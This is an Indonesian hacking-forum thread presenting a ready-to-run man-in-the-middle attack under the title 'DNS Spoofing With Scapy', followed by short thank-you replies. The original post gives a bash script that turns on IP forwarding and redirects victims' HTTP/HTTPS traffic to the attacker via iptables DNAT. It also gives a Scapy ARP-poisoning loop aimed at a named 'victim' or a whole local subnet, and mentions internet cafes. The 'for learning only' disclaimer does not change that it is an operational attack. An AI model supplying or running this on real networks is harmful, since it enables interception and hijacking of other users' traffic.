.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 DNS Spoofing With Scapy

Go down 
4 posters
PengirimMessage
Voldemort
BC Security
BC Security
Voldemort


Jumlah posting : 331
Points : 725
Reputation : 16
Join date : 04.07.11

DNS Spoofing With Scapy Empty
PostSubyek: DNS Spoofing With Scapy   DNS Spoofing With Scapy Icon_minitimeFri Mar 02, 2012 12:59 am

tulisan ini di buat semata-mata untuk pelajaran saja, tidak ada maksud untuk merusak & meningkatkan traffic cyber crime di indonesia.
penulis sangat berharap bahwa masyarakat indonesia bisa lebih meningkatkan security di di bidang IT (khususnya bagi para pengelola)internet cafe
& satu hal yang terpenting penulis sangat berharap masyarakat indonesia bisa beralih ke sistem operasi yang open source..hee…

[*] persiapan
” pastikan sistem operasi anda linux
” pastikan python scapy terinstall pada sistem operasi anda

jika belum terinstall python scapy, anda bisa meng install nya lewat synaptic (dalam hal ini saya menggunakan ubuntu)
jika sudah terinstall lanjut ke tahap selanjutnya.,

[*] konfigurasi

yang pertama lakukan IP forwading
echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian non aktivkan ICMP redirect
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

next IP tables setting
Apa saja yang bisa dilakukan dengan iptables?
Dengan kemampuan tools iptables ini, kita bisa membuat aturan (rule), untuk arus lalulintas data.
silahkan googleing untuk penjelasan lebih mendalam.

iptables –flush
iptables –zero
iptables –delete-chain
iptables -F -t nat

iptables –append FORWARD –in-interface wlan0/eth0 –jump ACCEPT
iptables –table nat –append POSTROUTING –out-interface wlan0/eth0 –jump MASQUERADE
iptables -t nat -A PREROUTING -p tcp –dport 80 –jump DNAT –to-destination 10.42.43.23
iptables -t nat -A PREROUTING -p tcp –dport 443 –jump DNAT –to-destination 10.42.43.23

ini bash scriptnya..biar ga repot-repot mengetik di termilal..

————————————–cut here——————————————————–

#!/bin/sh
INTERFACE=”wlan0″ #cek interface dg mengetikan ifconfig di terminal
SERVERWEB=’10.42.43.23′ #ip ente

echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

#clear rule..
iptables –flush
iptables –zero
iptables –delete-chain
iptables -F -t nat

iptables –append FORWARD –in-interface $INTERFACE –jump ACCEPT
iptables –table nat –append POSTROUTING –out-interface $INTERFACE –jump MASQUERADE

#rendirect traffic.. on my server/proxy
iptables -t nat -A PREROUTING -p tcp –dport 80 –jump DNAT –to-destination $SERVERWEB
iptables -t nat -A PREROUTING -p tcp –dport 443 –jump DNAT –to-destination $SERVERWEB
————————————–cut here——————————————————–
save dengan nama: terserah.sh

selanjutnya
save script python-scapy ini dengan nama : ihir.py
————————————–cut here——————————————————–
from scapy.all import *;
from time import sleep;
conf.iface=’wlan0′;#network card

target=”10.42.43.1″;#target /victim

router=”10.42.43.1″;#routernya

packet = ARP(); #bikin packet :P

packet.psrc = router # Gateway

packet.pdst = target # victim v.v

try:
while 1:
send(packet, verbose=0);
sleep(50);
except:
pass
————————————–cut here——————————————————–

nach yg perlu anda lakukan adalah menyesuaikan

INTERFACE=”wlan0″ #cek interface dg mengetikan ifconfig di terminal
SERVERWEB=’10.42.43.23′ #ip ente

network card yang terkoneksi dengan internet serta ip local anda
&
target=”10.42.43.19″;#target /victim

router=”10.42.43.1″;#routernya

kalau ingin semua permintaan packet client berpindah ke web server anda
target=”10.42.43.19/24″;#target /victim

dengan begitu semua IP local client akan di alihkan ke IP local anda…:D

[*] eksekusi

root@voldemort:/home/yur4kh4# ./terserah.sh
root@voldemort:/home/yur4kh4# python ihir.py

yupzz.,..tunggu beberapa saat
semua permintaan packet akan di kirimkan / di alihkan ke IP anda…:D

greettzz…..:D

[*] penutup
dengan di jalankannya volder.py maka berakhir pula tulisan yang sangat sederhana ini..
semoga sajha mudah untuk di mengerti..namun jika masih di anggap susah untuk di mengerti
silahkan balas thread saya ini DNS Spoofing With Scapy 1513430891

..Jangan berkata TIDAK, karena semua itu BELUM ..
Kembali Ke Atas Go down
ocim32
Pro Nubie
Pro Nubie
ocim32


Jumlah posting : 59
Points : 65
Reputation : 2
Join date : 28.01.12

DNS Spoofing With Scapy Empty
PostSubyek: Re: DNS Spoofing With Scapy   DNS Spoofing With Scapy Icon_minitimeSat Mar 03, 2012 11:38 am

thanks DNS Spoofing With Scapy 3529815765 gan...
Kembali Ke Atas Go down
cinta_code
Trainee
Trainee
cinta_code


Jumlah posting : 87
Points : 102
Reputation : 3
Join date : 27.02.12

DNS Spoofing With Scapy Empty
PostSubyek: Re: DNS Spoofing With Scapy   DNS Spoofing With Scapy Icon_minitimeSat Mar 03, 2012 11:54 am

nice share gan....
Kembali Ke Atas Go down
robofics
VIP Member
VIP Member
robofics


Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null

DNS Spoofing With Scapy Empty
PostSubyek: Re: DNS Spoofing With Scapy   DNS Spoofing With Scapy Icon_minitimeSat Mar 03, 2012 7:41 pm

weew ? triknya jempol DNS Spoofing With Scapy 3529815765
Kembali Ke Atas Go down
http://robofics.wordpress.com
Sponsored content





DNS Spoofing With Scapy Empty
PostSubyek: Re: DNS Spoofing With Scapy   DNS Spoofing With Scapy Icon_minitime

Kembali Ke Atas Go down
 
DNS Spoofing With Scapy
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Web attack-
Navigasi: